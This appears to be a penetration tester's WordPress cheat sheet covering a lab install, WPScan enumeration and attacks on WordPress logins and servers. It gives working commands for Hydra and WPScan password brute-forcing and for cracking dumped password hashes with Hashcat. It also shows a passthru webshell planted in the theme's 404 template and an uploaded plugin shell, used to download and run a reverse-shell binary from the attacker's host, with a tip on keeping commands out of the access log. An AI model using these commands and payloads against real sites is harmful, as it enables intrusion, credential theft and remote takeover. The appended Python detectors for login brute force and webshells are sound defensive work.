WordPress is a Content Management System (CMS).
Testing WordPress
Test for outdated plugins
Use WPScan to list plugins.
Test for XMLRPC exposure
TO COMPLETE
Test for exposed admin portal
From Enumerate Infrastructure and Application Admin Interfaces (WSTG-CONF-05, OWASP Testing Guide):
wp-admin/
wp-admin/about.php
wp-admin/admin-ajax.php
wp-admin/admin-db.php
wp-admin/admin-footer.php
wp-admin/admin-functions.php
wp-admin/admin-header.php
Using Burp Suite
- Install the WordPress Scanner extension from the BApp Store.
- Browse WordPress sites through Burp proxy.
- Vulnerable plugins and themes will appear in the issue list. Issues will also appear in the Scanner tab, with interesting findings highlighted.
Install WordPress on Kali Linux
Download WordPress, copy files to Apache’s root directory
wget -O /tmp/wordpress.tar.gz https://wordpress.org/latest.tar.gz
sudo tar -xzvf /tmp/wordpress.tar.gz -C /var/www/html/
sudo chown -R www-data.www-data /var/www/html/wordpress
Start Apache and MySQL
sudo service apache2 start
sudo service mysqld start
Create the WordPress database
Change the password!
sudo mysql
CREATE DATABASE wordpress;
GRANT SELECT,INSERT,UPDATE,DELETE,CREATE,DROP,ALTER
ON wordpress.*
TO wordpress@localhost
IDENTIFIED BY 'password';
FLUSH PRIVILEGES;
quit
Install WordPress
- Open a browser: http://127.0.0.1/wordpress/wp-admin/setup-config.php
- Choose English
Database name: wordpress
User name: wordpress
Password: the password set in the GRANT statement above
Database host: localhost
Table prefix: wp_
Access the website at http://127.0.0.1/wordpress/
Change the maximum upload file size (needed to import an export file from another WordPress site)
sudo nano /etc/php/8.1/apache2/php.ini
; upload_max_filesize = 2M
upload_max_filesize = 20M
sudo service apache2 reload
Fix the 404 Not Found error on permalinks
sudo a2enmod rewrite
sudo nano /etc/apache2/apache2.conf
Change AllowOverride to “All” instead of “None”.
<Directory /var/www/>
Options Indexes FollowSymLinks
AllowOverride All
Require all granted
</Directory>
sudo service apache2 restart
Update WordPress on Kali Linux
The dashboard update process needs an FTP server running on the web server.
Using root as the FTP account is not recommended.
ftp.py
#!/usr/bin/env python3
# Minimal FTP server (pip install pyftpdlib) exposing the WordPress directory so the
# dashboard updater can write files. Binding port 21 requires root privileges.
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer

authorizer = DummyAuthorizer()
# User name and password are what WordPress asks for on the Updates page.
# A dedicated low-privilege account is preferable to root (see the note above).
authorizer.add_user("root", "MYPASSWORD", "/var/www/html/wordpress", perm="elradfmwMT")
handler = FTPHandler
handler.authorizer = authorizer
# Listen on loopback only: WordPress connects to the FTP server from the same host.
server = FTPServer(("127.0.0.1", 21), handler)
server.serve_forever()
./ftp.py
Log in to the WordPress dashboard, and click on Updates.
Configuration Files
wp-config.php contains database credentials.
/var/www/html/wp-config.php
For troubleshooting, see Debugging in WordPress.
Recon
Exploits
Search for “WordPress” or plugin name in the Exploit Database.
WordPress Plugin WP Feed – ‘nid’ SQL Injection
https://www.exploit-db.com/exploits/38624
http://somedomain.com/wp-content/plugins/feed/news_dt.php?nid=[Sql]
Bruteforce login
Try user “admin” first.
Hydra – specific user
See Hydra.
IP=x.x.x.x
WL=/usr/share/wordlists/rockyou.txt
SUCCESS_MSG="302 Found"
COOKIES="wordpress_test_cookie=WP+Cookie+check"
hydra $IP http-form-post "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3a//${IP}/wp-admin/&testcookie=1:S=$SUCCESS_MSG:H=Cookie: ${COOKIES}" -l admin -P $WL -vV -f
WPScan – specific user
# --password-attack: wp-login, xmlrpc, xmlrpc-multicall
URL="http://x.x.x.x/wp"
WL=/usr/share/wordlists/rockyou.txt
wpscan --url $URL -P $WL -U admin --password-attack wp-login
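On the defensive side, the same markers the Hydra command relies on (POST to /wp-login.php, 302 Found on success) make a brute-force run visible in the web server's access log. The following Python script is an added example, not part of the original notes; it parses constructed Apache combined-format lines (not real traffic) and flags source IPs with many login POSTs inside a sliding time window, recording whether a 302 redirect followed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Apache "combined" log lines (not real traffic): five failed POSTs
# (200, login form re-rendered) then a 302 from one IP; one normal login from another.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:30 +0000] "POST /wp-login.php HTTP/1.1" 200 3421 "-" "curl/8.0"
203.0.113.5 - - [10/Oct/2023:13:55:31 +0000] "POST /wp-login.php HTTP/1.1" 200 3421 "-" "curl/8.0"
203.0.113.5 - - [10/Oct/2023:13:55:31 +0000] "POST /wp-login.php HTTP/1.1" 200 3421 "-" "curl/8.0"
203.0.113.5 - - [10/Oct/2023:13:55:32 +0000] "POST /wp-login.php HTTP/1.1" 200 3421 "-" "curl/8.0"
203.0.113.5 - - [10/Oct/2023:13:55:33 +0000] "POST /wp-login.php HTTP/1.1" 200 3421 "-" "curl/8.0"
203.0.113.5 - - [10/Oct/2023:13:55:34 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "curl/8.0"
198.51.100.7 - - [10/Oct/2023:13:56:20 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def parse(line):
    """Return (ip, time, method, path, status) or None if the line does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    return ip, when, method, path.split("?", 1)[0], int(status)

def detect_wp_login_bruteforce(lines, window=timedelta(minutes=5), threshold=5):
    """Flag IPs with >= threshold POSTs to /wp-login.php inside any `window`.
    redirect_seen marks a 302 from that IP: WordPress redirects after a successful
    login, the same success marker the Hydra command above relies on."""
    posts = defaultdict(list)  # ip -> [(time, status), ...]
    for line in lines:
        rec = parse(line)
        if rec and rec[2] == "POST" and rec[3] == "/wp-login.php":
            posts[rec[0]].append((rec[1], rec[4]))
    findings = {}
    for ip, events in posts.items():
        events.sort()
        peak = start = 0
        for end in range(len(events)):  # sliding window over sorted timestamps
            while events[end][0] - events[start][0] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            findings[ip] = {"attempts": len(events), "peak_in_window": peak,
                            "redirect_seen": any(st == 302 for _, st in events)}
    return findings
```

Run it over /var/log/apache2/access.log with `detect_wp_login_bruteforce(open(path))`; tune the window and threshold to the site's normal login rate.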
WPScan
WordPress Vulnerability Scanner.
Installation
It can also be downloaded from GitHub.
sudo apt install wpscan
Custom environment variables for commands
DIR="$HOME/Documents"   # a quoted ~ is not expanded by the shell
URL="http://someurl.com"
WL="/usr/share/wordlists/rockyou.txt"
Help
wpscan --help
Update the database
wpscan --update
Do ‘non-intrusive’ checks
wpscan --url $URL --log $DIR/wpscan_`date +"%Y%m%d_%H%M"`
List vulnerable plugins
wpscan --url $URL --enumerate vp --log $DIR/wpscan_`date +"%Y%m%d_%H%M"`
Enumerate installed plugins …
wpscan --url $URL --enumerate p --log $DIR/wpscan_`date +"%Y%m%d_%H%M"`
Enumerate installed themes …
wpscan --url $URL --enumerate t --log $DIR/wpscan_`date +"%Y%m%d_%H%M"`
Enumerate users …
wpscan --url $URL --enumerate u -o $DIR/wpscan_`date +"%Y%m%d_%H%M"`
All Plugins (ap), All Themes (at), Config backups (cb), Db exports (dbe)
wpscan --url $URL --enumerate ap,at,cb,dbe
WP Enum (Authenticated)
- Log in to the WordPress control panel at /wp-admin.
- Click on Tools->Site Health.
- Click on Info tab.
- Click on Server.
WP Database
mysql -u root -p wordpress
Extract usernames and password hashes
select user_login, user_pass from wp_users;
Crack the hashes with Hashcat, hash type 400 (phpass).
HASH=hash.txt
TYPE=400
WL=/usr/share/wordlists/rockyou.txt
hashcat -m $TYPE -a 0 $HASH $WL
hashcat -m $TYPE -a 0 $HASH $WL --show
Change user password
update wp_users set user_pass=MD5('admin') where user_login='admin';
Webshells & Reverse shells
- Hacking Articles
- php-reverse-shell (Pentestmonkey)
Webshell in 404 Not Found
- Log into WordPress at /wp-admin.
- Click on Appearance->Editor.
- Click on 404 Template.
- Add code at the end of the file. Keep the rest of the code.
<?php echo "<p>Hacked</p>";?>
<?php passthru($_REQUEST['myprecious']); ?>
To execute commands, visit a post id that does not exist or the theme 404 page.
http://x.x.x.x/?p=10000&myprecious=whoami
http://x.x.x.x/wp-content/themes/twentyfifteen/404.php?myprecious=whoami
Install a Web-Shell Plugin
SecLists ships a web-shell WordPress plugin and is already installed on Kali Linux.
Zip the plugin code
cd /usr/share/seclists/Web-Shells/WordPress
sudo zip plugin-shell.zip plugin-shell.php
Install the plugin
- Log into WordPress at /wp-admin.
- Click on Plugins. Click on Add New.
- Click on Upload Plugin. Click on Browse, select the plugin-shell.zip file and click Open. Click Install Now.
No need to Activate the plugin.
Test the plugin
The plugin documentation suggests using POST requests so that the command does not show up in the access log 😉
curl http://example.com/wp-content/plugins/plugin-shell/plugin-shell.php?cmd=whoami
Upload a reverse shell payload and execute it
Generate a reverse shell and start a listener. See Msfvenom.
python3 -m http.server 80
curl http://x.x.x.x/wp-content/plugins/plugin-shell/plugin-shell.php?cmd=wget%20-O%20rev.elf%20http://KALI_IP/rev.elf
# Do not forget to encode the "+" sign using %2b
curl http://x.x.x.x/wp-content/plugins/plugin-shell/plugin-shell.php?cmd=chmod%20u%2bx%20rev.elf
curl http://x.x.x.x/wp-content/plugins/plugin-shell/plugin-shell.php?cmd=ls%20-la
curl http://x.x.x.x/wp-content/plugins/plugin-shell/plugin-shell.php?cmd=./rev.elf
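Both payloads above, the passthru() line appended to the theme's 404.php and the uploaded plugin shell, have the same shape: a shell or eval sink fed straight from a request superglobal. A scan of the theme and plugin directories catches that shape even when POST requests keep the command out of the access log. The following Python scanner is an added example, not from SecLists or the original notes; the files it writes to a temporary directory are constructed stand-ins, not the real plugin-shell.php.

```python
import re
import tempfile
from pathlib import Path

# Sinks that hand a string to the shell or the PHP interpreter, and request-controlled sources.
SINKS = ("passthru", "system", "exec", "shell_exec", "popen", "proc_open", "eval")
SOURCES = ("$_REQUEST", "$_GET", "$_POST", "$_COOKIE", "php://input")
SINK_RE = re.compile(r"\b(" + "|".join(SINKS) + r")\s*\(", re.IGNORECASE)
SOURCE_RE = re.compile("|".join(re.escape(s) for s in SOURCES))

def scan_php_source(text):
    """Return [(line_no, sink, stripped_line)] for lines that call a sink and
    reference a request source on the same line (a cheap but effective heuristic)."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        m = SINK_RE.search(line)
        if m and SOURCE_RE.search(line):
            hits.append((no, m.group(1).lower(), line.strip()))
    return hits

def scan_tree(root):
    """Scan every .php file below root (run it over wp-content/themes and wp-content/plugins)."""
    root = Path(root)
    report = {}
    for path in sorted(root.rglob("*.php")):
        hits = scan_php_source(path.read_text(errors="replace"))
        if hits:
            report[path.relative_to(root).as_posix()] = hits
    return report

# Constructed sample tree: a 404 template with the appended passthru() line, a clean
# template, and a stand-in plugin shell (not the real SecLists file).
SAMPLES = {
    "themes/twentyfifteen/404.php": "<?php get_header(); ?>\n<h1>Not found</h1>\n"
                                    "<?php get_footer(); ?>\n<?php passthru($_REQUEST['myprecious']); ?>\n",
    "themes/twentyfifteen/index.php": "<?php get_header(); ?>\n<?php the_content(); ?>\n",
    "plugins/plugin-shell/plugin-shell.php": "<?php\nif (isset($_GET['cmd'])) { system($_GET['cmd']); }\n",
}

def demo():
    """Write SAMPLES to a temporary directory and return the scan report."""
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in SAMPLES.items():
            target = Path(tmp, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body)
        return scan_tree(tmp)
```

Review each hit by hand: legitimate plugins occasionally call exec() on sanitised input, so a hit is a lead, not a verdict.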